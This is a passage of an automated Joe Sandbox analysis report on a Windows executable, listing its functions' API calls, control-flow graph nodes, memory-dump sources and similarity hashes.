                                                    • SendMessageW.USER32(004012F5,000000B1,05F5E100,05F5E100), ref: 0040D05F
                                                    • SendMessageW.USER32(004012F5,00000444,00000001,0000005C), ref: 0040D083
                                                    • SendMessageW.USER32(004012F5,000000C2,00000000,0042A7F8), ref: 0040D094
                                                      • Part of subcall function 00418D09: DestroyWindow.USER32(?,75A45540,0040CFC4,?,?,?,?,?,0040D0D7,00000001,?,?,0040DFB7,0042A830,0044BF30,0044BF30), ref: 00418D14
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$DestroyItemShow
                                                    • String ID: \
                                                    • API String ID: 2996232536-2967466578
                                                    • Opcode ID: f27d4aafb9b25e16021a5c4da7230885d79aaadc79dcf51b93068843b2094804
                                                    • Instruction ID: 3bcfa04be87af39d439265c1cb0a45e1241d1bec1e9ff4188d2f9aa136dbdd9b
                                                    • Opcode Fuzzy Hash: f27d4aafb9b25e16021a5c4da7230885d79aaadc79dcf51b93068843b2094804
                                                    • Instruction Fuzzy Hash: 0B31C270E4025CBEEB219B90CC4AFAE7FB9EB41714F104129F604BA1D0D7B50D11DB95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 587 40e156-40e16c call 41a670 590 40e371-40e374 587->590 591 40e172-40e17e call 41a32f 587->591 591->590 594 40e184-40e1a7 call 41a3a0 591->594 597 40e1b1 594->597 598 40e1a9-40e1af 594->598 599 40e1b4-40e1b9 597->599 598->599 600 40e20a-40e20f 599->600 601 40e1bb 599->601 602 40e211-40e214 600->602 603 40e216-40e219 600->603 604 40e1bd-40e1c1 601->604 602->603 605 40e22b-40e23f call 40a297 602->605 603->605 606 40e21b-40e222 603->606 607 40e1c3 604->607 608 40e1dc-40e1e1 604->608 622 40e241-40e24e call 4119e6 605->622 623 40e257-40e261 call 40902d 605->623 606->605 609 40e224 606->609 610 40e1cc-40e1d1 607->610 612 40e1e3-40e1e9 608->612 613 40e1f6-40e1fd 608->613 609->605 616 40e1d3 610->616 617 40e1c5-40e1ca 610->617 612->613 619 40e1eb-40e1f2 612->619 614 40e204-40e207 613->614 615 40e1ff-40e201 613->615 614->600 615->614 616->608 617->610 621 40e1d5-40e1d8 617->621 619->604 620 40e1f4 619->620 620->600 621->608 622->623 630 40e250 622->630 628 40e280-40e28c ShellExecuteExW 623->628 629 40e263-40e27d call 40a769 623->629 632 40e370 628->632 633 40e292-40e2a6 628->633 629->628 630->623 632->590 635 40e2b5-40e2b8 633->635 636 40e2a8-40e2ab 633->636 638 40e2d1-40e2ed WaitForInputIdle call 40d548 635->638 639 40e2ba-40e2c5 IsWindowVisible 635->639 636->635 637 40e2ad-40e2b3 636->637 637->635 640 40e312-40e31e CloseHandle 637->640 638->640 646 40e2ef-40e2fe GetExitCodeProcess 638->646 639->638 641 40e2c7-40e2cd ShowWindow 639->641 643 40e320-40e32f call 4119e6 640->643 644 40e331-40e337 640->644 641->638 643->644 653 40e35f-40e362 643->653 648 40e339-40e33c 644->648 649 40e34a-40e35a 644->649 646->640 650 40e300-40e30b 646->650 648->649 652 40e33e-40e348 648->652 649->653 650->640 654 40e30d 650->654 652->653 653->632 655 40e364-40e367 653->655 654->640 655->632 656 40e369-40e36e ShowWindow 655->656 656->632
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_memset_wcslen
                                                    • String ID: .exe$.inf
                                                    • API String ID: 3215649069-3750412487
                                                    • Opcode ID: 299c0dbc75963e7897f8c70525011216fe4c7ea437754cab6388a9e856f4c11f
                                                    • Instruction ID: 2426b1d0564d678c393ad43d70cca87e94956e82958ae559a835b2815eadd3ba
                                                    • Opcode Fuzzy Hash: 299c0dbc75963e7897f8c70525011216fe4c7ea437754cab6388a9e856f4c11f
                                                    • Instruction Fuzzy Hash: 1D519471901258AADF31ABA2D8405AF7FB8AF01300F084C7FE941B72E1D77989B5DB49

                                                    Control-flow Graph

                                                    APIs
                                                    • LoadLibraryW.KERNELBASE(riched32.dll,00000000,00438820,?,?,?,0040FC47), ref: 00419BF9
                                                    • LoadLibraryW.KERNEL32(riched20.dll,?,0040FC47), ref: 00419C02
                                                    • OleInitialize.OLE32(00000000), ref: 00419C09
                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00419C21
                                                    • SHGetMalloc.SHELL32(0044E800), ref: 00419C2C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$CommonControlsInitInitializeMalloc
                                                    • String ID: riched20.dll$riched32.dll
                                                    • API String ID: 448729520-3294723617
                                                    • Opcode ID: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
                                                    • Instruction ID: bec1f3dff02ca963225762dc8c306ba0fdf2f44245cb56c0a91269f9c2818cf8
                                                    • Opcode Fuzzy Hash: 90f14c158bcb89b69ea4bae273e6414ebbc239f5036364857f5d8bbe2d5c0ea4
                                                    • Instruction Fuzzy Hash: F7F0E271B00308AFD7209FA1DC0DB8ABBE8EF40726F50042DE54493140D7B8A4018BA9

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040998E: GetVersionExW.KERNEL32(?), ref: 004099B3
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 00410FD7
                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?), ref: 00410FE7
                                                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00410FF3
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00411001
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041100B
                                                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,00000000,00000000,00000001), ref: 00411058
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004110D5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                    • String ID:
                                                    • API String ID: 2092733347-0
                                                    • Opcode ID: 6f4f92a70eba09b3495600295f97cb808364c991bffa0b9bc98bbd9497c34473
                                                    • Instruction ID: f4e3b1fa049264918395f3d3676c7671cc3ff43673ba9dc7e8ff30eccb9b6800
                                                    • Opcode Fuzzy Hash: 6f4f92a70eba09b3495600295f97cb808364c991bffa0b9bc98bbd9497c34473
                                                    • Instruction Fuzzy Hash: 3F41FB75E002189BCB14DFA5C8849EEBBF9FF4C310B14852EE946E7244D738A989CB65

                                                    Control-flow Graph

                                                    APIs
                                                    • SystemTimeToFileTime.KERNEL32(?,00411259,?,?), ref: 00411144
                                                    • LocalFileTimeToFileTime.KERNEL32(00411259,?), ref: 00411170
                                                    • FileTimeToSystemTime.KERNEL32(00411259,?), ref: 00411186
                                                    • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00411196
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004111A4
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004111AE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Time$File$System$Local$Specific
                                                    • String ID:
                                                    • API String ID: 3144155402-0
                                                    • Opcode ID: 6b63271ff8b70f806080f35f48d49c6b52bacc33e5f661e2bc001a464882075a
                                                    • Instruction ID: ff07d1204e9df2b29167d1fc2eddb3e11bcb12c5d2a1f7bcbe5d8ef3e2e57d95
                                                    • Opcode Fuzzy Hash: 6b63271ff8b70f806080f35f48d49c6b52bacc33e5f661e2bc001a464882075a
                                                    • Instruction Fuzzy Hash: 9D31327AA00219ABCF14DFE4C840AEFF7B9FF48710F04452AE945E7250E734A945CBA9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 990 41a086-41a097 call 41f65c 993 41a099-41a0a0 990->993 994 41a10e-41a113 call 41f6a1 990->994 996 41a0a2-41a0ba call 41eb63 call 41eb96 993->996 997 41a0e5 993->997 1008 41a0c5-41a0d5 call 41a0dc 996->1008 1009 41a0bc-41a0c4 call 41ebc6 996->1009 1000 41a0e6-41a0f6 RtlFreeHeap 997->1000 1000->994 1002 41a0f8-41a10d call 41e96e GetLastError call 41e92c 1000->1002 1002->994 1008->994 1015 41a0d7-41a0da 1008->1015 1009->1008 1015->1000
                                                    APIs
                                                    • __lock.LIBCMT ref: 0041A0A4
                                                      • Part of subcall function 0041EB63: __mtinitlocknum.LIBCMT ref: 0041EB79
                                                      • Part of subcall function 0041EB63: __amsg_exit.LIBCMT ref: 0041EB85
                                                      • Part of subcall function 0041EB63: EnterCriticalSection.KERNEL32(0041A52B,0041A52B,?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001), ref: 0041EB8D
                                                    • ___sbh_find_block.LIBCMT ref: 0041A0AF
                                                    • ___sbh_free_block.LIBCMT ref: 0041A0BE
                                                    • RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
                                                    • GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 2714421763-0
                                                    • Opcode ID: 713418213fa3b924a5db022641309ed8e71f6ef471490119430b1649068a1123
                                                    • Instruction ID: 73d86c86ae11ec172247dd6dba1c6c112c9550fe19059460788b477c0004c14d
                                                    • Opcode Fuzzy Hash: 713418213fa3b924a5db022641309ed8e71f6ef471490119430b1649068a1123
                                                    • Instruction Fuzzy Hash: 1401A275906315EBDB306F739C0ABDE3AA0AF04768F10411FF800A62D1DA3CA5D1DA5E

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00410C38: ResetEvent.KERNEL32(?,00000200,?,?,00404FD2), ref: 00410C5E
                                                      • Part of subcall function 00410C38: ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 00410C6E
                                                    • ReleaseSemaphore.KERNEL32(?,00000020,00000000,021F1300,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D00
                                                    • CloseHandle.KERNEL32(021F1304,021F1304,0044E590,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D21
                                                    • DeleteCriticalSection.KERNEL32(021F14A0,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D37
                                                    • FindCloseChangeNotification.KERNELBASE(?,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D43
                                                    • CloseHandle.KERNEL32(?,?,00000000,00410DF3,?,?,00401024,?,?,0040128E), ref: 00410D4B
                                                      • Part of subcall function 00410AAD: WaitForSingleObject.KERNEL32(?,000000FF,00410C7B,?), ref: 00410AB3
                                                      • Part of subcall function 00410AAD: GetLastError.KERNEL32(?), ref: 00410ABF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
                                                    • String ID:
                                                    • API String ID: 565839277-0
                                                    • Opcode ID: ca58e632b3b783b63512d94f15049283e17315acfd207e2999dda24762a21a4a
                                                    • Instruction ID: 9a9c497621359c990a617e9c2e34a8bb028c7d4a7b3a09de16c58b541c2cbaaa
                                                    • Opcode Fuzzy Hash: ca58e632b3b783b63512d94f15049283e17315acfd207e2999dda24762a21a4a
                                                    • Instruction Fuzzy Hash: AAF09675101708DFD7316B70DD41BD6B7A9EF06354F10082AFA9B42120CB7778A1DB68

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1025 419830-41984f GetClassNameW 1026 419851-419866 call 4119e6 1025->1026 1027 419877-419879 1025->1027 1032 419876 1026->1032 1033 419868-419874 FindWindowExW 1026->1033 1029 419884-419886 1027->1029 1030 41987b-41987e SHAutoComplete 1027->1030 1030->1029 1032->1027 1033->1032
                                                    APIs
                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00419847
                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0041987E
                                                      • Part of subcall function 004119E6: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,00000000,000000FF,00409A30,?,00000000,?,00409B4A,00000000,-00000002,?,00000000,?), ref: 004119FC
                                                    • FindWindowExW.USER32 ref: 0041986E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                    • String ID: EDIT
                                                    • API String ID: 4243998846-3080729518
                                                    • Opcode ID: 9899273405b88f4d302bfd59c2f9281fb6c9ea864ad29a30c1f38293d160aced
                                                    • Instruction ID: 2b24fd0b246fdebf6b7f97274a92ca10bdbb336c928bdee4251268382986ee6e
                                                    • Opcode Fuzzy Hash: 9899273405b88f4d302bfd59c2f9281fb6c9ea864ad29a30c1f38293d160aced
                                                    • Instruction Fuzzy Hash: 1CF0E2323002186BD730A7259C05FFB366C9B82B50F480036FE05E2284D768D882C5BE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1034 40855b-40857e call 41a670 1037 408580-408582 1034->1037 1038 408588 1034->1038 1037->1038 1039 408584-408586 1037->1039 1040 40858a-4085a6 1038->1040 1039->1040 1041 4085a8 1040->1041 1042 4085ae-4085bc 1040->1042 1041->1042 1043 4085c5-4085f3 CreateFileW 1042->1043 1044 4085be-4085c1 1042->1044 1045 4085f5-408617 GetLastError call 40a5bc 1043->1045 1046 408658-40866c 1043->1046 1044->1043 1052 408647-40864c 1045->1052 1053 408619-40863c CreateFileW GetLastError 1045->1053 1048 408686-408692 1046->1048 1049 40866e-408681 call 410792 1046->1049 1049->1048 1052->1046 1056 40864e 1052->1056 1054 408642-408645 1053->1054 1055 40863e 1053->1055 1054->1046 1054->1052 1055->1054 1056->1046
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,-80000000,?,00000000,00000003,-00000001,00000000,00000000,00000000,?,00000000,00406C45,00000000,00000005,?,00000011), ref: 004085EC
                                                    • GetLastError.KERNEL32(?,00000000,00406C45,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 004085F5
                                                    • CreateFileW.KERNEL32(?,-80000000,?,00000000,00000003,00000000,00000000,?,?,00000800,?,00000000,00406C45,00000000,00000005,?), ref: 0040862D
                                                    • GetLastError.KERNEL32(?,00000000,00406C45,00000000,00000005,?,00000011,00000000,?,00000000,?,0000003A,00000802,?,00000000,00000802), ref: 00408631
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorFileLast
                                                    • String ID:
                                                    • API String ID: 1214770103-0
                                                    • Opcode ID: 156eb4b2126d9bb5c547cf60d2f7ae02f1d96fc261b200f93c5351bfb089c77d
                                                    • Instruction ID: c5a87be2614fc2427225c1be7d563ec5bc50c25864dd67b016cb74c9d05143e5
                                                    • Opcode Fuzzy Hash: 156eb4b2126d9bb5c547cf60d2f7ae02f1d96fc261b200f93c5351bfb089c77d
                                                    • Instruction Fuzzy Hash: 303128315147449BE7308B208D05BEB77D4EB44318F144E3EF9D4A23C0DBBA95498B5A
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00401856
                                                      • Part of subcall function 00405ED9: __EH_prolog.LIBCMT ref: 00405EDE
                                                      • Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F41
                                                      • Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F4D
                                                      • Part of subcall function 00405ED9: _memset.LIBCMT ref: 00405F6B
                                                      • Part of subcall function 0040B5F2: __EH_prolog.LIBCMT ref: 0040B5F7
                                                    • _memset.LIBCMT ref: 00401999
                                                    • _memset.LIBCMT ref: 004019A8
                                                    • _memset.LIBCMT ref: 004019B7
                                                      • Part of subcall function 0041A41A: _malloc.LIBCMT ref: 0041A434
                                                      • Part of subcall function 00409DAE: __EH_prolog.LIBCMT ref: 00409DB3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _memset$H_prolog$_malloc
                                                    • String ID:
                                                    • API String ID: 4233843809-0
                                                    • Opcode ID: 36059e55d940a062022a2cea67ec7cd2dea6fb99428014aa4d92f54cf199f618
                                                    • Instruction ID: 83d0fe6ce04b428a854620314f95cb6379f2e49c9d0d95c367f0477aa6296122
                                                    • Opcode Fuzzy Hash: 36059e55d940a062022a2cea67ec7cd2dea6fb99428014aa4d92f54cf199f618
                                                    • Instruction Fuzzy Hash: EB5115B1845F849EC321DF7988912D7FFE0AB19310F94496E91FE93282D7352658CB2A
                                                    APIs
                                                    • GetStdHandle.KERNEL32(000000F6,004325AC,?,00000000,?,?,00408C38,?,00000000,00000800,?,00000000), ref: 00408A39
                                                    • ReadFile.KERNELBASE(?,?,00000800,00000000,00000000,004325AC,?,00000000,?,?,00408C38,?,00000000,00000800,?,00000000), ref: 00408A51
                                                    • GetLastError.KERNEL32(?,00408C38,?,00000000,00000800,?,00000000), ref: 00408A89
                                                    • GetLastError.KERNEL32(?,00408C38,?,00000000,00000800,?,00000000), ref: 00408AA4
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileHandleRead
                                                    • String ID:
                                                    • API String ID: 2244327787-0
                                                    • Opcode ID: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
                                                    • Instruction ID: 5b86b98262a763a2b1aac685d922e531e20719b04805407dfc6ef191c52c8e13
                                                    • Opcode Fuzzy Hash: c610f9014d8eeb7b064f26712c9d4da67e362c16071d56148ef50c45903ee7ce
                                                    • Instruction Fuzzy Hash: A111A030700204EFCF209B60CE0096A37A8AB40374B10813FE9A6A5BC0DE3C8C51DF6A
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00407473
                                                      • Part of subcall function 004186BB: _wcscpy.LIBCMT ref: 004187A4
                                                    • _memcmp.LIBCMT ref: 00407A3B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_memcmp_wcscpy
                                                    • String ID: E
                                                    • API String ID: 1926841707-3568589458
                                                    • Opcode ID: d7cafb4cde09b7c00f65498caacab5e277d94ded439c8c29843c9d87f48543b7
                                                    • Instruction ID: cf964ad92503e1b09d677bb6f917278792a2ea00dcb53aa951a45fd549403193
                                                    • Opcode Fuzzy Hash: d7cafb4cde09b7c00f65498caacab5e277d94ded439c8c29843c9d87f48543b7
                                                    • Instruction Fuzzy Hash: CA62B970D086459EDF25DB64C484BEA7BA55F01308F0840FFE94A6B2D2C77D7A84CB5A
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0040CE1A
                                                    • GetMessageW.USER32 ref: 0040CE2B
                                                    • TranslateMessage.USER32(?), ref: 0040CE35
